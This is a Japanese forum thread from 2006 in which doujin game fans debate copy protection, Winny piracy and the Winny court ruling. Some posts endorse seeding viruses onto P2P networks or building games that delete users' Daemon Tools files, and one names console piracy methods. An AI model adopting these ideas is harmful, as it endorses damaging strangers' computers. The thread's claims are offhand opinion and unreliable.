307 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 18:00:15 ID:nLm3qezT
落とすときはイメージだしNoCD化パッチも付いてるけどね(・∀・)

308 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 21:48:39 ID:w1quX6ht
>>299
全て憶測でしかないが
その時のビショップには、なにがなんでもコピーを防止してやる!
という強い意気込みがあって、その結果CDコピー対策やウィルス仕込みを行い
売り上げを力づくで伸ばしたという事かな

やる前から後ろ向きになって諦めていては防げるものも防げん
知恵を絞って対策を模索してみるべきじゃないだろうか

309 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 00:16:18 ID:7u/2lAbG
宣伝だろ

310 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 00:59:37 ID:FQj30MrL
ビショップは強硬に対応してるから、売り上げが伸びたんだね。
他のメーカーも見習わなきゃ。

311 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 09:08:19 ID:SJiQhY/9
同人の話がいつの間にか商売の話に

312 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 12:14:56 ID:u/zg4ps1
だってここネタスレだし

313 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 13:46:46 ID:BboL0XZ5
>>303-304
無断コピーをさせない方法を話すスレで
コピープロテクトが持つ弊害を挙げた書き込みに対する反論(?)が
おまえら、そんな「じゃコピーすれば良いだろ」的な意味のこと、言われても

ハハハハハハハハハハハハハハハハ腹が痛いアッハハハハハハ

314 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 13:51:07 ID:BboL0XZ5
そりゃ、ハハハ、コピーすればコピープロテクトが付いてても、ハハハ、大丈夫だよな
何が大丈夫なのかサッパリ分からんが、ハハハ、やばいよ最高だよお前ら…!

315 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 14:20:03 ID:R6iKm65m


316 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 14:26:44 ID:dqZgGWqT
確かにさっぱり分からんわw

317 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 14:54:29 ID:ew5EZ/pq
真性の基地外が沸いてるな。これだからネタスレ観察はやめられんw

318 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 15:54:54 ID:7qozTsPu
>>313-314の笑いのツボがわからん
別にコピー防止させようという側の奴だけが集まってるわけじゃないだろ
その道(コピーする側)の人の書き込みにしか見えないんだが

319 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 16:18:26 ID:BboL0XZ5
>>318
あるコピー防止策を批判する意見に対して、君の言う「コピーする側」が反論しているわけだ
つまりコピーを防止するスレでコピーを推奨する書き込みしかない状況、なんとも酷い話だな、と
それが笑いのツボ、説明さすなよ


しかし俺自身もコピー厨だから煽られても平気だが
真面目にレスされるとレス返さないかん気がするからまいる

320 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 16:34:32 ID:dqZgGWqT
どうやら本物みたいだな。

321 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 17:14:38 ID:asBWhtN+


322 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 17:26:50 ID:dkqe/iIu
これは酷いな

323 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 17:29:36 ID:7qozTsPu
ここにはコピ厨しかいませんよ^^;

324 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 17:34:09 ID:BboL0XZ5
そんな現実なんて知りたくなかった

325 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 18:10:33 ID:Obk8mVht
プロテクト実装どころかプレス代捻出すらきついのが現実(´▽`*)


326 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 20:41:20 ID:zMDvW7Mh
つ「ダウンロード販売」

327 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 21:56:50 ID:8eOhQNIo
良スレだったのにアホに茶化されて糞になったな
2chでコピー対策を話し合えば目障りに思う乞食どもが
アホ菌撒き散らしてうやむやにしようとするのは当然の流れか

328 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 22:14:58 ID:dqZgGWqT
>>327
マジレスすると、市販ソフトの誕生以来延々と繰り返されている
プロテクトとコピーのいたちごっこに、同人レベルで太刀打ち
できると思ってる脳みそお花畑な連中が集まるから茶化されるんだろ。
客観的に見ても、割れ乞食よりもアホに見えるよ。

329 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 22:21:52 ID:7qozTsPu
だって初代>>1の内容がアホだったもん

330 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 22:38:28 ID:1poaVqJZ
犯罪者の被害にあいたくないから
自分が犯罪者になろうとか言っちゃうぐらいだしな

331 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/30(木) 23:01:12 ID:Jo4qnrl7
ゲームどころかソフト作者でもないのに「なんかアイデアないかな」と思って
ここで駄弁ってるけど、アホのID:BboL0XZ5や>327と同類扱いされるのは勘弁

332 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/01(金) 00:11:00 ID:lT9QvckF
逆襲のシャア面白いよね
16年ぐらい前の作品なのに未だに種シリーズより戦闘シーンが動いているとはどういう事だ

やっぱ種は駄目だね、同人ネタとしてしか評価できん。


333 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/01(金) 01:58:23 ID:JRzh6U5K
>>328の言うとおりだな
こんな過疎板のクソスレ一個如きで状況が変わるとか思ってる奴はマジで頭おかしいんじゃねえの?
nyが悪いとかそういうレベルじゃねーぞw

334 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/01(金) 02:14:02 ID:St10egbh
>>>333
でも今週某団体の出したwinnyの玉虫色の被害金額を見ると奴らもここの真性と同レベルだよなぁ。
邪巣楽苦は有名すぎるアレな団体だし、GONZ…は売り上げ下がったのは自分達の作品の評価を思い出せと思うし。

335 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/01(金) 07:51:40 ID:CrL9kk6b
そうそう。
誰かがウイルス混入させても状況は変わらないから、バンバン流すべきだな。

336 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/03(日) 23:48:24 ID:vbrIUBtz
クズはほっといて
コピープロテクトとP2Pでのウィルス混入で対処すれば良いと言う事だな
成功例もある

337 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/03(日) 23:59:18 ID:3d5tnlMX
ダウンロード・無断コピーをする価値のないようなゲームばかりを開発する
これ最強

338 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 00:06:24 ID:04Oe0HZ5
世の中、糞ゲー愛好家ってのもいるから

339 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 00:14:46 ID:hRy5IbxW
>>337
それでもダウンロードされて、「あのゲーム買ったけど、無茶苦茶糞」と
2chに書かれまくる悪寒

340 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 00:19:09 ID:KzmyhtRv
根本を言えばWinnyが無くなればいいんだよね
その為にはどうしたらよいのかを考えるべき

341 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 11:35:08 ID:N7YqBY2r
そんな事言ってるから割れ厨に馬鹿にされるんだよ

342 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 12:30:06 ID:tvXTIwAw
>>340
インターネットを破壊するか、人類を滅亡させるのが簡単な対処法だと思うよ。

343 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 13:42:48 ID:Bleu8SlD
>>342
鬼 才 現 る

まぁ、冗談抜きにしてnyとかを無くすのって、今現在ゴキブリ絶滅くらいに不可能なレベルだからねぇ
ウィルス撒いても大勢に影響なんて殆どねえし

344 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/04(月) 18:17:09 ID:uyhEOmZA
実際痛い目見るのは県職員とか警察官とかだったりして

345 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/05(火) 00:30:45 ID:udz6vrOJ
子供のためにny使ってます
http://www.nipponham.co.jp/winny/


346 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/07(木) 13:58:04 ID:rRVWh99l
>>343
nyを根絶すること自体は不可能でないと思う。
ただ問題はnyが消えてもそれに代わるP2Pが新たに幾らでも誕生するってことだろう。
そもそも公共のメディアに載ったら興味を出す人が増えるだけだw
著作権法が改定される2008まで待つのがもっとも正解だろうけど、人権擁護法案と同じく余計なものが混りそうで怖い。

347 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/07(木) 17:18:28 ID:GMLr9bjQ
普通に不可能

348 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/11(月) 01:35:50 ID:kw5wYQRo
プレイするためにはCDを入れないと駄目なようにする。
んで、昔たしかナイツオブオナーだっけな? でやったみたいにDaemonが入ってる場合
Daemonのexeを消去するようなプログラムを組み込んどく。
流石に起動するたびにデーモン入れなおす暇人もいないだろ。

あれ? これで完璧なんじゃね?

349 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/11(月) 02:01:20 ID:g7d0Ulqd
ディスクレスで動くものはほとんどない商業エロゲは
ディスクレスで動く改良?コピーがp2pにほぼ全タイトル流されているのが現状

350 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/11(月) 02:41:11 ID:yTfTBF9i
>>348
daemon入ってたら起動できないのはもうあるだろ

351 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/11(月) 10:26:49 ID:PunKPHKL
デーモンの代わりはいるもの

352 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 15:22:33 ID:6DSPIYAU
金子有罪
作者死してny残る

シェアを無料で大量堕嘘されたくないやつは2008年まで様子見れ

353 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 15:38:41 ID:KMaysR85
ttp://internet.watch.impress.co.jp/cda/event/2006/10/06/13548.html

この記事思い出した。
そろそろ警察も動くかも。

354 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 18:45:08 ID:ObrmXN3m
2008年になって法を改正したとしても
どのみち解決しないだろ
普通に考えて



355 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 19:06:31 ID:382hWSYs
winnyがあるから売れないと思ってるってのはあれか
winnyが無くなったら売れ行きが伸びるとでも思っているのか

356 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 19:14:03 ID:R+DTUhqZ
可処分所得は変わらないんだから、
普通に考えれば増えても大手がちょこっと増えるくらいだろうな。

357 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 19:26:32 ID:ObrmXN3m
てか同人ゲームてたいていのやつがとても値段にみあったような出来じゃないよな
そんなのがWinnyがなくなったところで売れるわけがない



358 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 20:23:45 ID:og9DwXVJ
判決出たから、そろそろ警察も動きそうだな。
見せしめとして何人か捕まるかもな。

359 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 20:27:00 ID:+QKXh2lk
見せしめに逮捕するのはいいと思う。
でもまずお膝元の京都府警でwinny使ってた奴を逮捕しなければ他所から叩かれるぞw
身内に甘い警察組織がそんなことするのかねぇ?

360 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 20:48:35 ID:+NlgTUBt
身内に甘いから一般人だけ捕まえる
一般人に叩かれたって全然平気、警察なんてそんなもん

361 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 20:57:04 ID:R+DTUhqZ
判決でたっていっても控訴するみたいだよ?
どっちも引かなそうだから最高裁までいくんじゃね?

362 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 20:58:26 ID:KMaysR85
一気に100人くらいやるかも。
海外だと1000人単位でばんばん逮捕や告訴してるから、
それでも甘すぎるよな、日本。

今日のJTBもだけど、最近、この手の違法行為に警察が積極的に動いてくれてるのは、
色んな意味でありがたい。

363 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 20:59:16 ID:0UV4lbEN
法と正義を守るという表向きのため
無断コピーしている一般人を片っ端から逮捕して欲しい

364 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 21:10:17 ID:PpO9GYs0
2chの 更には同人ゲーム板で何と御立派な

外で遊べ

365 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 21:20:29 ID:HJYZsEu+
今は冬だ
一人で外行ってろ

366 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 21:42:34 ID:0dhw8TKs
本当に無知が多いなw面白い

367 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/13(水) 21:56:41 ID:HJYZsEu+
消えろ変態

368 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 00:04:50 ID:YeqICdZc
そこまで対策したいならPS2で出せばいいだけだと思うが。

369 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 01:40:02 ID:NaWzUPut
PS2もwinnyで流れております

370 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 06:51:47 ID:OXvcifFb
PS2のソフトをコピーできないと思っているのか。
ほんと、そんな知識で対策考え用なんて…
馬鹿の考えなんとやらだな。

371 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 06:52:08 ID:OXvcifFb
×用
○よう

372 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 09:43:09 ID:YFA+T94d
だから、みんなでウイルス流しまくりが一番いいよ。
防御に回った方が不利なんだ。

373 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 16:48:51 ID:YeqICdZc
>>369-370
PS2でもコピーできるが、エミュが動作不安定、できないのもあって
まだまだ実用的ではないのでは?
俺はPS2は無理だった。

374 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 17:01:00 ID:CnaPuIvN
わざわざエミュを使う意味が分からん
焼いて実機に突っ込むだろ

375 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 19:01:28 ID:JIwQU7xe
>>368
同人の規模でPS2用ソフトなんてそうそう
開発できる分けねえだろアホ

376 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 19:46:13 ID:YeqICdZc
>>374
え?できるの?
PSはまんまコピーだとチェックに引っかかるからPS2も駄目だと思ってた。
すり抜けるように改造してあるのかな?

377 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 20:25:20 ID:CnaPuIvN
PSもPS2もまんまコピーしただけじゃ使えないけど
トレイこじ開けたりMOD付けたりPAR使ったりSwapMagic使ったり
方法は色々あるじゃん
知らないだけだろ

378 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/17(日) 20:46:38 ID:YeqICdZc
PSは正規製品との入れ替えのすり抜けは知ってるけどPS2は完全無知です。

379 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/20(水) 12:51:25 ID:/Dk8Rlrv
ttp://www.itmedia.co.jp/news/articles/0612/19/news023.html

2chで議論してた連中の殆ど、これ読んだら恥ずかしくてたまらなくなるだろうな。

380 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/12/21(木) 10:51:10 ID:UWjw1DWl
判決は正しかったという事を再認識できたけど罰金は150万か
もっと増やしてもいいと思うな

111 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)